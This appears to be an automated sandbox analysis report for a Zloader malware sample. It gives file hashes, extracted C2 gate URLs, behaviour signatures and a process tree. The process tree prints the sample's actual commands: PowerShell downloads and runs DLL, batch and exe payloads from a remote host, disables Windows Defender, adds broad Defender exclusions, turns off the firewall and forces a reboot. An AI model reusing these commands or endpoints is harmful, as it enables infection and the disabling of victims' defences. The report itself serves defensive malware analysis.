Analysis

  • max time kernel
    38s
  • max time network
    174s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    06-08-2021 06:34

Errors

Reason
Remote task has failed: Machine shutdown

General

  • Target

    aac2b6314988e0aea824fe0a53b917c1.exe

  • Size

    165KB

  • MD5

    aac2b6314988e0aea824fe0a53b917c1

  • SHA1

    17c0d629b7a2f940e7a69f1120582cf89f70355a

  • SHA256

    6c8e5f1670515c6a9d3cdcafe6d9a782a87f0f085095558cc0116ea73281c059

  • SHA512

    0245fb86597e7106ef24a7348b9251fbf3936ff3643f372bea90b0c736c1275695012ce699d47c709597c1972c6a2af977507ba7378eefa5a73afeea48559715

Malware Config

Extracted

Family

zloader

Botnet

vasja

Campaign

vasja

C2

https://iqowijsdakm.com/gate.php

https://wiewjdmkfjn.com/gate.php

https://dksaoidiakjd.com/gate.php

https://iweuiqjdakjd.com/gate.php

https://yuidskadjna.com/gate.php

https://olksmadnbdj.com/gate.php

https://odsakmdfnbs.com/gate.php

https://odsakjmdnhsaj.com/gate.php

https://odjdnhsaj.com/gate.php

https://odoishsaj.com/gate.php

rc4.plain
rsa_pubkey.plain

Signatures

  • Zloader, Terdot, DELoader, ZeusSphinx

    Zloader is a malware strain that was initially discovered back in August 2015.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 1 TTPs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\aac2b6314988e0aea824fe0a53b917c1.exe
    "C:\Users\Admin\AppData\Local\Temp\aac2b6314988e0aea824fe0a53b917c1.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:564
    • C:\Windows\system32\cmd.exe
      cmd /c start.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1436
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Invoke-WebRequest https://gucdhwpcfjmmcefypliv.com/JavaE.dll -OutFile JavaE.dll
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1376
      • C:\Windows\system32\regsvr32.exe
        regsvr32 JavaE.dll
        3⤵
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious use of WriteProcessMemory
        PID:1808
        • C:\Windows\SysWOW64\regsvr32.exe
          JavaE.dll
          4⤵
          • Loads dropped DLL
          PID:444
          • C:\Windows\SysWOW64\msiexec.exe
            msiexec.exe
            5⤵
              PID:1260
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Invoke-WebRequest https://gucdhwpcfjmmcefypliv.com/nsudo.bat -OutFile nsudo.bat
          3⤵
            PID:780
          • C:\Windows\system32\cmd.exe
            cmd /c nsudo.bat
            3⤵
              PID:924
              • C:\Windows\system32\cacls.exe
                "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
                4⤵
                  PID:1968
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Invoke-WebRequest https://gucdhwpcfjmmcefypliv.com/javase.exe -OutFile javase.exe
                  4⤵
                    PID:952
                  • C:\Users\Admin\AppData\Roaming\javase.exe
                    javase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
                    4⤵
                      PID:1052
                    • C:\Users\Admin\AppData\Roaming\javase.exe
                      javase -U:T sc config WinDefend start= disabled
                      4⤵
                        PID:1128
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionProcess '"C:\Users\Admin\AppData\Roaming'"
                        4⤵
                          PID:1460
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -command "Add-MpPreference -ExclusionProcess "regsvr32""
                          4⤵
                            PID:1988
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell.exe -command "Add-MpPreference -ExclusionProcess ".exe""
                            4⤵
                              PID:1624
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe -command "Add-MpPreference -ExclusionProcess "iexplorer.exe""
                              4⤵
                                PID:1692
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell.exe -command "Add-MpPreference -ExclusionProcess "explorer.exe""
                                4⤵
                                  PID:972
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe -command "Add-MpPreference -ExclusionProcess ".dll""
                                  4⤵
                                    PID:1672
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell.exe -command "netsh advfirewall set allprofiles state off"
                                    4⤵
                                      PID:1288
                                      • C:\Windows\system32\netsh.exe
                                        "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                        5⤵
                                          PID:1804
                                      • C:\Windows\system32\shutdown.exe
                                        shutdown.exe /r /t 00
                                        4⤵
                                          PID:1748
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Restart-Computer
                                          4⤵
                                            PID:288
                                        • C:\Windows\system32\timeout.exe
                                          timeout 20
                                          3⤵
                                          • Delays execution with timeout.exe
                                          PID:376
                                    • C:\Windows\system32\LogonUI.exe
                                      "LogonUI.exe" /flags:0x0
                                      1⤵
                                        PID:840
                                      • C:\Windows\system32\AUDIODG.EXE
                                        C:\Windows\system32\AUDIODG.EXE 0x4f8
                                        1⤵
                                          PID:268
                                        • C:\Windows\system32\LogonUI.exe
                                          "LogonUI.exe" /flags:0x1
                                          1⤵
                                            PID:960

                                          Network

                                          MITRE ATT&CK Matrix ATT&CK v6

                                          Persistence

                                          Modify Existing Service

                                          1
                                          T1031

                                          Registry Run Keys / Startup Folder

                                          1
                                          T1060

                                          Defense Evasion

                                          Modify Registry

                                          1
                                          T1112

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0c2f22cf-fe12-4603-8944-96a62e859a9c
                                            MD5

                                            2d5cd190b5db0620cd62e3cd6ba1dcd3

                                            SHA1

                                            ff4f229f4fbacccdf11d98c04ba756bda80aac7a

                                            SHA256

                                            ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

                                            SHA512

                                            edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_81699231-b0d1-4960-bd12-d315266f39d2
                                            MD5

                                            e5b3ba61c3cf07deda462c9b27eb4166

                                            SHA1

                                            b324dad73048be6e27467315f82b7a5c1438a1f9

                                            SHA256

                                            b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

                                            SHA512

                                            a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_90b0dc57-a727-4823-98ef-97dc74017a74
                                            MD5

                                            d89968acfbd0cd60b51df04860d99896

                                            SHA1

                                            b3c29916ccb81ce98f95bbf3aa8a73de16298b29

                                            SHA256

                                            1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

                                            SHA512

                                            b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d414f484-3574-4f4f-ad06-3b93dd55fd62
                                            MD5

                                            a70ee38af4bb2b5ed3eeb7cbd1a12fa3

                                            SHA1

                                            81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

                                            SHA256

                                            dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

                                            SHA512

                                            8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e3e2d8c5-0e01-4f23-b684-635ac34b8cc5
                                            MD5

                                            6f0d509e28be1af95ba237d4f43adab4

                                            SHA1

                                            c665febe79e435843553bee86a6cea731ce6c5e4

                                            SHA256

                                            f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

                                            SHA512

                                            8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef918be3-a69d-4314-b29f-005ef7745c7e
                                            MD5

                                            7f79b990cb5ed648f9e583fe35527aa7

                                            SHA1

                                            71b177b48c8bd745ef02c2affad79ca222da7c33

                                            SHA256

                                            080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

                                            SHA512

                                            20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f6aa8da1-f4b9-461b-a9bd-5f6a99f69bda
                                            MD5

                                            faa37917b36371249ac9fcf93317bf97

                                            SHA1

                                            a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

                                            SHA256

                                            b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

                                            SHA512

                                            614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                            MD5

                                            ced66df9e3a854810a97073c87fcd679

                                            SHA1

                                            c2d1b59b97721e5e5440a59aabfb6c4c3e1c361d

                                            SHA256

                                            4e5e1b3afe7f79b8825083caddadb1b46aaf8f32dde5e60f4ec6185c60c875e2

                                            SHA512

                                            9f8c91cb80ca8c1fe81455d08aa32f51e21bc49d7ee50502185c3f501073b9ca9e420e17e80f95a5fb74312c72192d24cab80e89787e65186934e72eccb1a050

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                            MD5

                                            14691e2e4c6a966721c75b76cb23a3cf

                                            SHA1

                                            ee5a0a8d0b64f5de5eb72f9800e84196f364fcc4

                                            SHA256

                                            d8100cb427ea238f0082cbd8ade18f35819bebc330de03886546b7445368f943

                                            SHA512

                                            b7c8042ea08614d5851c1012e263ed7a4cfeaeb600e45a179ab7ada3262ee45ea8919786065f8795adbe1e09e26ae885be6c459bb4458ff043b9ca55362a8b27

                                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\start.bat
                                            MD5

                                            eec559fabd6ec7024f586fb3a1754fac

                                            SHA1

                                            f7498a978c2ed501a3b5d8478cdbd60a72a2d60a

                                            SHA256

                                            30892cefd5d62af5c37c7b431c0c03cd90c8bcb795d4c7c0db97b087e2cdf4be

                                            SHA512

                                            8010da9eb8b00079411aff2bbca28e0d778c3a9fdd1fe299d0f42d61f435e161af54e14079ad3dbbfa9b0592817d453f1305b91879cd5e8f4a6968481e20ee17

                                          • C:\Users\Admin\AppData\Roaming\JavaE.dll
                                            MD5

                                            86cef6c066a05b3f67123fbf638b6b01

                                            SHA1

                                            81618f8ecc48541c219aa974e4b16cab8f34203b

                                            SHA256

                                            86c37d778f584a2a3090ab170c8cd2fb3ddf952cde689b4c5a1efd74fc113a05

                                            SHA512

                                            1132f94eeb8ae5d4556841976789b648f2394a4089db2e6b43c2047cc87004f00e334e14a96c5ab0535aeb13f3bffc8d5e955d7435b9be2aba491bcbe92044d9

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                            MD5

                                            feb1140d842614a064922ebffd56fe1c

                                            SHA1

                                            0cfb284283cff9e147b0398ff4d5f19f078f7db0

                                            SHA256

                                            1a581bbf1703d675a0db083e0875bb619c049ce631e4dd27a0718d479d62766e

                                            SHA512

                                            c267fee95e0697fe8cc62db39f58e06cbe1130b851637a09560c331305ac1b9aa3974376a9df7df50200e2199b280d5de27e0c7d88805c2241998dd8ac1d6e66

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                            MD5

                                            feb1140d842614a064922ebffd56fe1c

                                            SHA1

                                            0cfb284283cff9e147b0398ff4d5f19f078f7db0

                                            SHA256

                                            1a581bbf1703d675a0db083e0875bb619c049ce631e4dd27a0718d479d62766e

                                            SHA512

                                            c267fee95e0697fe8cc62db39f58e06cbe1130b851637a09560c331305ac1b9aa3974376a9df7df50200e2199b280d5de27e0c7d88805c2241998dd8ac1d6e66

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                            MD5

                                            feb1140d842614a064922ebffd56fe1c

                                            SHA1

                                            0cfb284283cff9e147b0398ff4d5f19f078f7db0

                                            SHA256

                                            1a581bbf1703d675a0db083e0875bb619c049ce631e4dd27a0718d479d62766e

                                            SHA512

                                            c267fee95e0697fe8cc62db39f58e06cbe1130b851637a09560c331305ac1b9aa3974376a9df7df50200e2199b280d5de27e0c7d88805c2241998dd8ac1d6e66

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                            MD5

                                            feb1140d842614a064922ebffd56fe1c

                                            SHA1

                                            0cfb284283cff9e147b0398ff4d5f19f078f7db0

                                            SHA256

                                            1a581bbf1703d675a0db083e0875bb619c049ce631e4dd27a0718d479d62766e

                                            SHA512

                                            c267fee95e0697fe8cc62db39f58e06cbe1130b851637a09560c331305ac1b9aa3974376a9df7df50200e2199b280d5de27e0c7d88805c2241998dd8ac1d6e66

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                            MD5

                                            feb1140d842614a064922ebffd56fe1c

                                            SHA1

                                            0cfb284283cff9e147b0398ff4d5f19f078f7db0

                                            SHA256

                                            1a581bbf1703d675a0db083e0875bb619c049ce631e4dd27a0718d479d62766e

                                            SHA512

                                            c267fee95e0697fe8cc62db39f58e06cbe1130b851637a09560c331305ac1b9aa3974376a9df7df50200e2199b280d5de27e0c7d88805c2241998dd8ac1d6e66

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                            MD5

                                            feb1140d842614a064922ebffd56fe1c

                                            SHA1

                                            0cfb284283cff9e147b0398ff4d5f19f078f7db0

                                            SHA256

                                            1a581bbf1703d675a0db083e0875bb619c049ce631e4dd27a0718d479d62766e

                                            SHA512

                                            c267fee95e0697fe8cc62db39f58e06cbe1130b851637a09560c331305ac1b9aa3974376a9df7df50200e2199b280d5de27e0c7d88805c2241998dd8ac1d6e66

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                            MD5

                                            feb1140d842614a064922ebffd56fe1c

                                            SHA1

                                            0cfb284283cff9e147b0398ff4d5f19f078f7db0

                                            SHA256

                                            1a581bbf1703d675a0db083e0875bb619c049ce631e4dd27a0718d479d62766e

                                            SHA512

                                            c267fee95e0697fe8cc62db39f58e06cbe1130b851637a09560c331305ac1b9aa3974376a9df7df50200e2199b280d5de27e0c7d88805c2241998dd8ac1d6e66

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                            MD5

                                            feb1140d842614a064922ebffd56fe1c

                                            SHA1

                                            0cfb284283cff9e147b0398ff4d5f19f078f7db0

                                            SHA256

                                            1a581bbf1703d675a0db083e0875bb619c049ce631e4dd27a0718d479d62766e

                                            SHA512

                                            c267fee95e0697fe8cc62db39f58e06cbe1130b851637a09560c331305ac1b9aa3974376a9df7df50200e2199b280d5de27e0c7d88805c2241998dd8ac1d6e66

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                            MD5

                                            feb1140d842614a064922ebffd56fe1c

                                            SHA1

                                            0cfb284283cff9e147b0398ff4d5f19f078f7db0

                                            SHA256

                                            1a581bbf1703d675a0db083e0875bb619c049ce631e4dd27a0718d479d62766e

                                            SHA512

                                            c267fee95e0697fe8cc62db39f58e06cbe1130b851637a09560c331305ac1b9aa3974376a9df7df50200e2199b280d5de27e0c7d88805c2241998dd8ac1d6e66

                                          • C:\Users\Admin\AppData\Roaming\javase.exe
                                            MD5

                                            5cae01aea8ed390ce9bec17b6c1237e4

                                            SHA1

                                            3a80a49efaac5d839400e4fb8f803243fb39a513

                                            SHA256

                                            19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

                                            SHA512

                                            c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

                                          • C:\Users\Admin\AppData\Roaming\javase.exe
                                            MD5

                                            5cae01aea8ed390ce9bec17b6c1237e4

                                            SHA1

                                            3a80a49efaac5d839400e4fb8f803243fb39a513

                                            SHA256

                                            19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

                                            SHA512

                                            c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

                                          • C:\Users\Admin\AppData\Roaming\nsudo.bat
                                            MD5

                                            06005e9cf3aec2b86a3be78623683b46

                                            SHA1

                                            f7e3d83dd9466eeb8b7e4cf3322a08e757a6b63a

                                            SHA256

                                            1f9e24e527f702f5f4a7f65a776df38b2d4240d8e3f13713045cab3466746272

                                            SHA512

                                            bb99a6ad1da80692a12f9079bf3be80bd656fa4eb4aef59b1a64affebc5b8a95525c0ebed1bd186cf30493cbba85fc49d1093472bdc3027608daa05fde302323

                                          • \??\PIPE\srvsvc
                                            MD5

                                            d41d8cd98f00b204e9800998ecf8427e

                                            SHA1

                                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                                            SHA256

                                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                            SHA512

                                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                          • \??\PIPE\srvsvc
                                            MD5

                                            d41d8cd98f00b204e9800998ecf8427e

                                            SHA1

                                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                                            SHA256

                                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                            SHA512

                                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                          • \??\PIPE\srvsvc
                                            MD5

                                            d41d8cd98f00b204e9800998ecf8427e

                                            SHA1

                                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                                            SHA256

                                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                            SHA512

                                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                          • \??\PIPE\srvsvc
                                            MD5

                                            d41d8cd98f00b204e9800998ecf8427e

                                            SHA1

                                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                                            SHA256

                                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                            SHA512

                                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                          • \Users\Admin\AppData\Roaming\JavaE.dll
                                            MD5

                                            86cef6c066a05b3f67123fbf638b6b01

                                            SHA1

                                            81618f8ecc48541c219aa974e4b16cab8f34203b

                                            SHA256

                                            86c37d778f584a2a3090ab170c8cd2fb3ddf952cde689b4c5a1efd74fc113a05

                                            SHA512

                                            1132f94eeb8ae5d4556841976789b648f2394a4089db2e6b43c2047cc87004f00e334e14a96c5ab0535aeb13f3bffc8d5e955d7435b9be2aba491bcbe92044d9

                                          • \Users\Admin\AppData\Roaming\javase.exe
                                            MD5

                                            5cae01aea8ed390ce9bec17b6c1237e4

                                            SHA1

                                            3a80a49efaac5d839400e4fb8f803243fb39a513

                                            SHA256

                                            19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

                                            SHA512

                                            c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

                                          • \Users\Admin\AppData\Roaming\javase.exe
                                            MD5

                                            5cae01aea8ed390ce9bec17b6c1237e4

                                            SHA1

                                            3a80a49efaac5d839400e4fb8f803243fb39a513

                                            SHA256

                                            19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

                                            SHA512

                                            c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

                                          • memory/288-210-0x0000000000000000-mapping.dmp
                                          • memory/444-77-0x0000000000200000-0x0000000000201000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/444-74-0x0000000000000000-mapping.dmp
                                          • memory/444-75-0x00000000757C1000-0x00000000757C3000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/444-78-0x0000000010000000-0x0000000010148000-memory.dmp
                                            Filesize

                                            1.3MB

                                          • memory/564-59-0x000007FEFBF71000-0x000007FEFBF73000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/780-89-0x000000001AB50000-0x000000001AB52000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/780-80-0x0000000000000000-mapping.dmp
                                          • memory/780-87-0x0000000002260000-0x0000000002261000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/780-90-0x000000001AB54000-0x000000001AB56000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/780-85-0x000000001ACA0000-0x000000001ACA1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/780-84-0x0000000002410000-0x0000000002411000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/780-86-0x0000000002450000-0x0000000002451000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/780-92-0x000000001B880000-0x000000001B881000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/840-212-0x00000000027C0000-0x00000000027C1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/924-93-0x0000000000000000-mapping.dmp
                                          • memory/952-100-0x000000001ABA0000-0x000000001ABA1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/952-103-0x000000001A950000-0x000000001A952000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/952-102-0x0000000002270000-0x0000000002271000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/952-96-0x0000000000000000-mapping.dmp
                                          • memory/952-99-0x00000000026F0000-0x00000000026F1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/952-104-0x000000001A954000-0x000000001A956000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/952-105-0x000000001C180000-0x000000001C181000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/952-101-0x0000000002640000-0x0000000002641000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/960-214-0x0000000002760000-0x0000000002761000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/972-184-0x000000001AC14000-0x000000001AC16000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/972-183-0x000000001AC10000-0x000000001AC12000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/972-177-0x0000000000000000-mapping.dmp
                                          • memory/1052-107-0x0000000000000000-mapping.dmp
                                          • memory/1128-111-0x0000000000000000-mapping.dmp
                                          • memory/1260-79-0x0000000000000000-mapping.dmp
                                          • memory/1260-88-0x0000000000090000-0x00000000000B6000-memory.dmp
                                            Filesize

                                            152KB

                                          • memory/1288-196-0x0000000000000000-mapping.dmp
                                          • memory/1288-204-0x000000001AD00000-0x000000001AD02000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1288-205-0x000000001AD04000-0x000000001AD06000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1376-67-0x000000001AB20000-0x000000001AB22000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1376-69-0x0000000002490000-0x0000000002491000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1376-62-0x0000000000000000-mapping.dmp
                                          • memory/1376-64-0x00000000023D0000-0x00000000023D1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1376-65-0x000000001ABA0000-0x000000001ABA1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1376-66-0x00000000026C0000-0x00000000026C1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1376-68-0x000000001AB24000-0x000000001AB26000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1376-70-0x000000001B6B0000-0x000000001B6B1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1436-60-0x0000000000000000-mapping.dmp
                                          • memory/1460-124-0x000000001A940000-0x000000001A941000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1460-139-0x000000001AAC0000-0x000000001AAC1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1460-114-0x0000000000000000-mapping.dmp
                                          • memory/1460-118-0x0000000002370000-0x0000000002371000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1460-119-0x000000001AC00000-0x000000001AC01000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1460-140-0x000000001AAD0000-0x000000001AAD1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1460-121-0x000000001AB80000-0x000000001AB82000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1460-127-0x000000001B5B0000-0x000000001B5B1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1460-122-0x000000001AB84000-0x000000001AB86000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1460-123-0x0000000002700000-0x0000000002701000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1624-158-0x0000000000000000-mapping.dmp
                                          • memory/1624-165-0x000000001ABF0000-0x000000001ABF2000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1624-166-0x000000001ABF4000-0x000000001ABF6000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1672-187-0x0000000000000000-mapping.dmp
                                          • memory/1672-193-0x000000001AA70000-0x000000001AA72000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1672-194-0x000000001AA74000-0x000000001AA76000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1692-175-0x000000001AB84000-0x000000001AB86000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1692-174-0x000000001AB80000-0x000000001AB82000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1692-168-0x0000000000000000-mapping.dmp
                                          • memory/1748-208-0x0000000000000000-mapping.dmp
                                          • memory/1804-206-0x0000000000000000-mapping.dmp
                                          • memory/1808-71-0x0000000000000000-mapping.dmp
                                          • memory/1968-95-0x0000000000000000-mapping.dmp
                                          • memory/1988-141-0x0000000000000000-mapping.dmp
                                          • memory/1988-146-0x000000001A830000-0x000000001A832000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1988-147-0x000000001A834000-0x000000001A836000-memory.dmp
                                            Filesize

                                            8KB